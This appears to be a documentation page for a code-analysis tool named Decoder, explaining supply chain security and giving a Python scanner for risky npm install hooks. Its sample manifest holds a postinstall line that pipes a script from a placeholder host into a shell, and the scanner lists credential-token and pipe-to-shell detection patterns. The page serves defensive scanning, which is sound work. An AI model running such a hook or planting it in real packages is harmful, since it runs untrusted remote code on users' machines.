Supply Chain Security — Trusting what you ship
Supply chain security is about trusting the code you didn't write. Decoder helps inventory and inspect that surface during analysis.
What it is
Discipline focused on the integrity of dependencies, build systems, and distribution channels.
Why it's useful
Modern breaches (SolarWinds, xz-utils, npm event-stream) come from upstream, not your code.
How Decoder implements it
Dependency surfacing plus a malware scan on uploaded sources; reports highlight unexpected scripts and postinstall hooks.
When to use it
Reviewing new dependencies, auditing third-party drops, evaluating M&A repos.
When NOT to use it
Build provenance / SLSA attestations — out of scope today.
Practical example
A postinstall hook executing curl|sh from a fresh npm package is flagged during scan.
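As an added illustration of the kind of check behind that flag (this is example code written for this page, not Decoder's own scanner), the following script parses a constructed package.json, reports npm lifecycle hooks that match a small set of high-risk patterns such as a download piped into a shell, lists any remaining hooks as informational, and also notes dependencies whose spec points outside the registry. The rule set, the severities and the sample manifest are all assumptions of the example.

```python
import json
import re

# Constructed sample manifest (not from any real package) whose postinstall
# hook pipes a remote script into a shell and whose dependency list pulls one
# package from a git URL instead of the registry.
SAMPLE_PACKAGE_JSON = """{
  "name": "example-widget",
  "version": "1.2.3",
  "scripts": {
    "build": "tsc -p .",
    "test": "jest",
    "postinstall": "curl -s https://example.invalid/setup.sh | sh"
  },
  "dependencies": {
    "left-pad": "^1.3.0",
    "helper-lib": "git+https://example.invalid/helper-lib.git#main"
  }
}"""

# npm lifecycle scripts that run automatically on install or publish; anything
# in this set executes on a developer or CI machine without being invoked.
LIFECYCLE_HOOKS = frozenset({
    "preinstall", "install", "postinstall", "prepare",
    "preuninstall", "postuninstall", "prepublish", "prepublishOnly",
    "prepack", "postpack",
})

# Patterns that are rarely legitimate inside an install hook. The rule set
# is an assumption of this example, not a complete catalogue.
HIGH_RISK_RULES = [
    ("remote_pipe_to_shell",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sh|bash|zsh|node|python[23]?)\b")),
    ("inline_node_eval", re.compile(r"\bnode\s+(-e|--eval)\b")),
    ("base64_decode", re.compile(r"\bbase64\s+(-d|--decode)\b")),
    ("shell_profile_write", re.compile(r">>\s*\S*\.(bashrc|zshrc|profile)\b")),
    ("credential_env_reference",
     re.compile(r"\$\{?(NPM_TOKEN|GITHUB_TOKEN|AWS_SECRET_ACCESS_KEY|CI_JOB_TOKEN)\b")),
]

# Dependency specs that bypass the registry and therefore its integrity
# metadata in the lockfile.
NON_REGISTRY_SPEC = re.compile(r"^(git\+|git://|https?://|github:|file:)")


def scan_scripts(scripts):
    """Findings for lifecycle hooks: high-risk matches get 'high', any other hook 'info'."""
    findings = []
    for hook, command in scripts.items():
        if hook not in LIFECYCLE_HOOKS:
            continue  # ordinary scripts (build, test) only run when invoked
        matched = [name for name, rx in HIGH_RISK_RULES if rx.search(command)]
        if matched:
            for name in matched:
                findings.append({"kind": "script", "hook": hook, "rule": name,
                                 "severity": "high", "detail": command})
        else:
            # A hook with no matching pattern is still worth a reviewer's eye.
            findings.append({"kind": "script", "hook": hook,
                             "rule": "lifecycle_hook_present",
                             "severity": "info", "detail": command})
    return findings


def scan_dependencies(manifest):
    """Findings for dependencies resolved from somewhere other than the registry."""
    findings = []
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in manifest.get(section, {}).items():
            if NON_REGISTRY_SPEC.match(spec):
                findings.append({"kind": "dependency", "hook": None,
                                 "rule": "non_registry_source",
                                 "severity": "medium", "detail": f"{name}@{spec}"})
    return findings


def scan_package_json(text):
    """Parse a package.json string and return all findings as a list of dicts."""
    manifest = json.loads(text)
    return scan_scripts(manifest.get("scripts", {})) + scan_dependencies(manifest)


if __name__ == "__main__":
    for finding in scan_package_json(SAMPLE_PACKAGE_JSON):
        print(f"[{finding['severity']}] {finding['rule']}: {finding['detail']}")
```

Run against the sample, the script reports the postinstall hook as `remote_pipe_to_shell` (high) and `helper-lib` as `non_registry_source` (medium); a hook such as `node ./scripts/build-native.js` would surface only as an informational `lifecycle_hook_present` entry, which is the right default for a reviewer who wants to see every install-time execution path before trusting a drop.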
FAQ
Glossary
- SBOM: Software Bill of Materials — inventory of components.
- SLSA: Supply-chain Levels for Software Artifacts — build-integrity framework.
Related
- Most code in any modern project isn't yours. Decoder reads manifests and lockfiles to map the dependency surface and flag suspicious entries.
- Static malware analysis inspects code and binaries without executing them. Decoder runs it locally on your upload and surfaces suspicious patterns, entropy spikes and known indicators — no API key required.
- LockBit 3.0 leaked source provided a real-world benchmark. This entry walks through what Decoder flags and why — useful as a reference for ransomware patterns.
- Dockerfiles are configuration that becomes runtime. Decoder flags the common foot-guns before they hit your registry.